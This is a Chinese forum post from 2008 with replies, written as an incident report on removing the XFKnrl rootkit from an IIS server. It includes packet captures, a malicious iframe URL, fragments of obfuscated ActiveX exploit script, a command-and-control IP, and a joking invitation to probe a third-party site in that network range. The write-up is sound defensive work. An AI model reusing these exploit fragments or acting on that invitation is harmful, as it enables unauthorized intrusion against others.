Ring0级的rootkit XFKnrl的发现、删除及其他

t920

1. 
   
2. 
   
3. 1、
   
4. 首先是发现浏览该服务器网页时，最底端加入了一段iframe：
   
5. [url]http://bh.jebooo.com/3002.htm[/url]
   
6. 追查该代码，关键字：
   
7. BD96C556-65A3-11D0-983A-00C04FC29
   
8. var real=new ActiveXObject("IERPCtl.IERPCtl.1");
   
9. var storm=new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer");
   
10. var Lz=new ActiveXObject("GLC"+"HAT.G"+"LCh"+"atC"+"trl.1");
    
11. function GetCookie_cnzz(name)
    
12. 应该是利用了ie的一些activex漏洞进行种木马和刷流量的操作
    
13. 
    
14. 
    
15. 2、
    
16. 追查工作暂时放到一边，首要问题是解决服务器异常
    
17. 最开始是怀疑有arp攻击，登录到服务器上查看
    
18. arp -a得到网关mac，与正确的网关mac一致，windump抓包
    
19. windump -X -i 3 -n arp
    
20. 也没有发现异常arp广播
    
21. 检查web文件，也正常，底部并没有加码
    
22. 初步确定是服务器本身有问题
    
23. 
    
24. 
    
25. 3、
    
26. 继续抓包，查看http包
    
27. windump -X -i 3 -s 65535 -n host **.**.**.** and port 80
    
28. 发现在正常的页面请求结束前，被插入了一段
    
29. 10:06:39.430635 IP xx.xx.xx.xx.80 > yy.yy.yy.yy.2407: P 254:325(71) ack 417
    
30. win 65119
    
31.         0x0000:  4500 006f 1251 4000 8006 d0c4 d233 b9ca  [email]E..o.Q@......3[/email]..
    
32.         0x0010:  d233 b941 0050 0967 fddc 6d08 11ce dc82  .3.A.P.g..m.....
    
33.         0x0020:  5018 fe5f 17d5 0000 0d0a 3c69 6672 616d  P.._......<ifram
    
34.         0x0030:  6520 7372 633d 6874 7470 3a2f 2f62 682e  e.src=http://bh.
    
35.         0x0040:  6a65 626f 6f6f 2e63 6f6d 2f33 3030 322e  jebooo.com/3002.
    
36.         0x0050:  6874 6d20 7769 6474 683d 3020 6865 6967  htm.width=0.heig
    
37.         0x0060:  6874 3d30 3e3c 2f69 6672 616d 653e 00    ht=0></iframe>.
    
38. 
    
39. 正是页面底部被嵌入的iframe
    
40. 这说明服务器的iis进程或网卡驱动被hook，在侦测到某种类型文件的http请求后，在传输结束前挂马
    
41. 
    
42. 
    
43. 
    
44. 4、
    
45. 检查服务器，查看进程、服务、N处注册表启动项、系统帐号
    
46. 均未发现异常
    
47. 请出icesword，检查内核模块，发现两个可疑的家伙
    
48. XFKnrl.sys 和 rvdport.sys
    
49. 文件路径都是system32\drivers\，但到该目录下查找并没有这两个文件，基本能确定是rootkit了
    
50. 正常的内核模块没必要隐藏自己
    
51. procexp搜索全部进程的handle，果然
    
52. 发现在inetinfo进程中有 \device\XFKnrl加载项，iis被插了！
    
53. 
    
54. 
    
55. 
    
56. 5、
    
57. 用Wsyscheck和RkUnhooker再进一步检查内核模块和驱动
    
58. 除了icesword查到的两个sys之外再没有其他发现
    
59. ssdt和fsd的各个函数也没有被hook的报告
    
60. NtQueryDirectoryFile
    
61. NtQuerySystemInformation
    
62. NtDeviceIoControlFile
    
63. 都正常！
    
64. 但在wsyscheck的“安全检查”-“端口状态”中发现，进程inetinfo每几秒就向61.164.176.139：3002发syn
    
65. 
    
66. 12:01:20.108071 IP xx.xx.xx.xx.4627 > 61.164.176.139.3002: S 3273827924:32738
    
67. 27924(0) win 65535 <mss 1460,nop,nop,sackOK>
    
68.         0x0000:  4500 0030 125f 4000 8006 6e3b d233 b9ca  [email]E..0._@...n[/email];.3..
    
69.         0x0010:  3da4 b08b 1213 0bba c322 a654 0000 0000  =........".T....
    
70.         0x0020:  7002 ffff 81ad 0000 0204 05b4 0101 0402  p...............
    
71. 12:01:20.180418 IP 61.164.176.139.3002 > xx.xx.xx.xx.4627: R 0:0(0) ack 1 win
    
72. 0
    
73.         0x0000:  4500 0028 0186 0000 7306 cc1c 3da4 b08b  E..(....s...=...
    
74.         0x0010:  d233 b9ca 0bba 1213 0000 0000 c322 a655  .3...........".U
    
75.         0x0020:  5014 0000 ae5d 0000 aaaa 0000 aaaa       P....]........
    
76. 12:01:22.592705 IP xx.xx.xx.xx.4628 > 61.164.176.139.3002: S 1189036599:11890
    
77. 36599(0) win 65535 <mss 1460,nop,nop,sackOK>
    
78.         0x0000:  4500 0030 126a 4000 8006 6e30 d233 b9ca  [email]E..0.j@...n0.3[/email]..
    
79.         0x0010:  3da4 b08b 1214 0bba 46df 4237 0000 0000  =.......F.B7....
    
80.         0x0020:  7002 ffff 620d 0000 0204 05b4 0101 0402  p...b...........
    
81. 12:01:22.654909 IP 61.164.176.139.3002 > xx.xx.xx.xx.4628: R 0:0(0) ack 11890
    
82. 36600 win 0
    
83.         0x0000:  4500 0028 2deb 0000 7306 9fb7 3da4 b08b  E..(-...s...=...
    
84.         0x0010:  d233 b9ca 0bba 1214 0000 0000 46df 4238  .3..........F.B8
    
85.         0x0020:  5014 0000 8ebd 0000 aaaa 0000 aaaa       P.............
    
86. 
    
87. 61.164.176.139基本可以确定就是rootkit的控制端了
    
88. 
    
89. 
    
90. 
    
91. 
    
92. 6、
    
93. google了一下XFKnrl，没发现太多有用的信息
    
94. 只好先在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys
    
95. 删除所有文件权限，重启
    
96. web页面挂马问题消失，内核模块XFKnrl和rvdport也都没有加载
    
97. 但进程inetinfo依然向61.164.176.139：3002发包！
    
98. 先用组策略ipsec封掉到61.164.176.0/24网段和端口3002的通讯
    
99. 继续检查系统
    
100. 
     
101. 
     
102. 
     
103. 7、
     
104. 再次procexp搜索全部进程的handle，没有发现XFKrnl和rvdport的踪影
     
105. 又检查了一遍内核模块和驱动，没有新发现
     
106. 目标锁定在了inetinfo进程上
     
107. 用wsyscheck查inetinfo的线程信息，对比其他正常服务器的该项信息
     
108. 发现异常线程iisencv.dll
     
109. procexp搜索全部进程的dll，发现iisencv.dll 插入到了inetinfo.exe和 w3wp.exe中
     
110. 结束该线程后，inetinfo停止向61.164.176.139：3002发包！
     
111. 但随后检查内核模块时发现，XFKnrl居然又被加载了！
     
112. 这至少证明了iisencv.dll和XFKnrl.sys的关系
     
113. 
     
114. 
     
115. 8、
     
116. 搜索注册表iisencv.dll，发现
     
117. [HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603]
     
118. "000"="iisecnv.dll"
     
119. "001"="mswsock.dll"
     
120. "002"="ntdll.dll"
     
121. "003"="ntkrnlpa.exe"
     
122. "004"="*.gif"
     
123. "005"="usbcams3.sys"
     
124. "006"="AtiSrv.exe"
     
125. "007"="usbhcid.sys"
     
126. "008"="*.exe"
     
127. 
     
128. [HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5604]
     
129. "000"="jebooo"
     
130. "001"="bh.jebooo.com"
     
131. "002"="xf.jebooo.com"
     
132. 
     
133. 
     
134. 
     
135. 9、
     
136. 终极操作：
     
137. 在system32\drivers\下建立两个0字节的文件XFKnrl.sys 和 rvdport.sys删除所有文件权限
     
138. 删除注册表中相关项和文件
     
139. 用wsyscheck的“重启后删除文件”功能，添加c:/windows/system32/inetsrv/iisencv.dll，重启
     
140. 
     
141. 内核模块XFKnrl.sys和rvdport.sys没有被加载，inetinfo进程也不再发包，但IIS崩溃了！
     
142. 重新安装iis，恢复.net2.0的web扩展服务，重建web站点，貌似一切恢复正常了。
     
143. 
     
144. 
     
145. 
     
146. 10、
     
147. 把iisencv.dll抓到本地，IDA pro分析
     
148. 基本功能大致包括了：
     
149. httpfilter-过滤http协议
     
150. hook \\inetsrv\wamreg.dll
     
151. 加载驱动  system32\drivers\XFKnrl.sys
     
152. 调用cmd.exe
     
153. md5filt
     
154. aspnet_filter
     
155. CopyFileA  DeleteFileA  隐藏和删除文件
     
156. 
     
157. 
     
158. 大概能知道这个XFKnrl rootkit都做了些什么，它没有做隐藏进程和端口的操作，对文件也只是在内核模块加载到内存高位后进行删除操作，
     
159. 所以查ssdt没有什么发现是正常的，开始我还以为真的有这么NB的rootkit可以绕过icesword、wsyscheck和RkUnhooker的检查呢！
     
160. 主要的功能就是过滤http协议，外加得到一个反弹的shell，如果不是它的驱动是运行在kernel模式，还真不好意思叫它ring0 ！
     
161. 
     
162. 
     
163. 
     
164. 11、
     
165. 后续问题：
     
166. 先去拜访一下61.164.176.139
     
167. inetnum:      61.164.176.128 - 61.164.176.143
     
168. netname:      YIWU-RONGJI-BUISNESS
     
169. country:      CN
     
170. descr:        Yiwu Rongji Handware Buisness
     
171. 该段里有个应用系统
     
172. [url]http://www.lunababe.com/[/url]
     
173. 估计也是漏洞一大堆，有兴趣的可以去看一下，也许能搞到XFKnrl的控制端，哈哈~
     
174. 
     
175. 
     
176. 12、
     
177. 唠叨几句：
     
178. 中了rootkit最好还是重装
     
179. 测试用服务器正式上线前最好也是重装
     
180. 防火墙外运行的服务器拿到里边来之前最好也重装
     
181. 尽量用从可靠途径获得的系统软件
     
182. 
     

复制代码

haterw

试下超级巡警

我爱臭豆腐

不能是你那里的机器叫人家给搞了吧?

唯三色彩

还是不知道是怎么进来的？那么下次怎样防御呢？

t920

我爱臭豆腐

        发表于 2008-4-21 19:54

不能是你那里的机器叫人家给搞了吧?

哈，是啊

唯三色彩

        发表于 2008-4-22 12:21

还是不知道是怎么进来的？那么下次怎样防御呢？

有可能是注入，也可能是做测试的时候有弱口令之类的漏洞，还有可能是安装了不安全的软件……

Kendiv

嗯，不错。多写些paper，参加VB2008 ，呵呵

unicom_2

很多时候,服务器的软件安装源真的很重要

huyongzs

windows技术啊。挺厉害。windows下高手很多的。呵呵

when_we

我的好像是在安装serv-u  6.41汉化的时候带入的